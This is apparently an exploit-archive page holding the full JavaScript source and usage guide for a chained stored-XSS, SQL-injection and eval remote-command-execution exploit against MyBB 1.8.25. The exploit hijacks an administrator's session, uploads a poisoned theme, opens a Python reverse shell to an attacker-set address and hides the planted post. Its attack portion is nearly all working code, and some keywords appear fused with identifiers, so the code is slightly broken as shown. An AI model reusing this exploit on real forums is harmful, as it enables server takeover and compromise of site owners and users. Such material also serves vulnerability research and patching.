exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MyBB 1.8.25 Remote Command Execution

MyBB 1.8.25 Remote Command Execution
Posted Mar 22, 2021
Authored by SivertPL

MyBB version 1.8.25 chain remote command execution exploit that leverages cross site scripting and SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
advisories | CVE-2021-27889, CVE-2021-27890
SHA-256 | 346cb7b2b76354697b6dad56b74d10e2a918ecc58d1255b8e981d570c996ec5a

MyBB 1.8.25 Remote Command Execution

Change Mirror Download
# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution
# Exploit Author: SivertPL (kroppoloe@protonmail.ch)
# Date: 19.03.2021
# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval().
# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip
# CVE: CVE-2021-27889, CVE-2021-27890

Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums

The exploit requires the target administrator to have a valid ACP session.

Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ

Guide:

1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it.

Please replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.

document.write('<script src=http://localhost:8000/second_stage.js></script>');

2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.

You can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/

3) Put the resulting encoded payload in the nested autourl vulnerability vector:

[img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]

4) The final payload should look like this:

[img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]

5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported.
Once the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP.

After the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.

6) Enjoy your RCE! For educational purposes only.

*/

constREVERSE_SHELL_IP = "localhost";
constREVERSE_SHELL_PORT = 5554;

constPAYLOAD_XML_NAME = "payload";
constPAYLOAD_XML_VERSION = "1821";

constXML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";

constSHELL_PAYLOAD = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
constSQL_PAYLOAD = "') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\'" + btoa(SHELL_PAYLOAD) + "\\'))}' from mybb_templates -- ";

// Trigger the actual vulnerability, force cache reload.
// Stage: Final
functiontrigger() {
varrequest = newXMLHttpRequest();

request.open('GET', '/index.php');
request.send();
}

// Poison the cache.
// Stage: 6
functionset_as_default(token, tid) {

varrequest = newXMLHttpRequest();

request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);

request.onload = function() { trigger(); };

request.send();
}

// Get the TID of the downloaded theme payload
// Stage: 5
functionget_payload_tid(token) {
varrequest = newXMLHttpRequest();

request.open('GET', '/admin/index.php?module=style-themes');

request.responseType = "document";

request.onload = function() {

varresponse = request.response;

varaTags = response.getElementsByTagName("a");
varsearchText = "payload";
varfound;

for (vari = 0; i < aTags.length; i++) {
if (aTags[i].textContent == searchText) {
found = aTags[i];
break;
}
}

varhref = found.getAttribute("href");

varurlParams = newURLSearchParams(href);

vartid = urlParams.get("tid");

set_as_default(token, tid);
};

request.send();

}

// We pass the actual request to upload the template exploiting the second link of the exploit chain
// Stage: 4
functionupload_template(token) {

varrequest = newXMLHttpRequest();

request.open('POST', '/admin/index.php?module=style-themes&action=import');

vardata = newFormData();

data.append('my_post_key', token);
data.append('local_file', build_payload(), PAYLOAD_XML_NAME + ".xml");
data.append('import', 0);
data.append('url', '');
data.append('tid', '1');
data.append('name', "payload");
data.append("version_compat", 1);
data.append("import_stylesheets", 1);
data.append("import_templates", 1);

request.onload = function() {
// After uploading the template, set it as default to poison the cache
get_payload_tid(token)
};

request.send(data);
}

// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.
// Stage: 3
functionbuild_payload() {
varxmlDom = document.implementation.createDocument("", "", null);

vartheme = xmlDom.createElement("theme");
theme.setAttribute("name", PAYLOAD_XML_NAME);
theme.setAttribute("version", PAYLOAD_XML_VERSION);

varproperties = xmlDom.createElement("properties");
theme.appendChild(properties);

vartemplate_set = xmlDom.createElement("templateset");
template_set.innerHTML = SQL_PAYLOAD;
properties.appendChild(template_set);

xmlDom.appendChild(theme);

varserialized = newXMLSerializer().serializeToString(xmlDom);

varresult = XML_PROLOG + serialized;
varfile = newFile([result], PAYLOAD_XML_NAME);

returnfile;
}

// Acquire the anti-CSRF token
// Stage: 2
functionacquire_token(request) {

varresponse = request.response;
vartoken = response.getElementsByName("my_post_key")[0].value;

if(token == null) {
/* ACP Session either expired or wasn't established to begin with */
return;
}

// We have acquired the anti-CSRF token now.
upload_template(token);
}

// ACP Code Execution
// Stage: 1
functionexec_acp() {

varrequest = newXMLHttpRequest();

request.open('GET', 'admin/index.php?module=style-themes&action=import');
request.responseType = "document";

request.onload = function() {
acquire_token(request);
};

request.send();
}

// We hide the payload, to raise less suspicions
// Stage: 0
functionhide() {

vargetAll = document.querySelectorAll("[src*='http://xyzsomething.com/image?)<a href=']");

getAll.forEach(element=> {
varpNode = element.parentNode.innerText="lmao whatever you say";
});

}

// Entry point of the exploit
functionstart() {
hide();
exec_acp();
}

start();
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close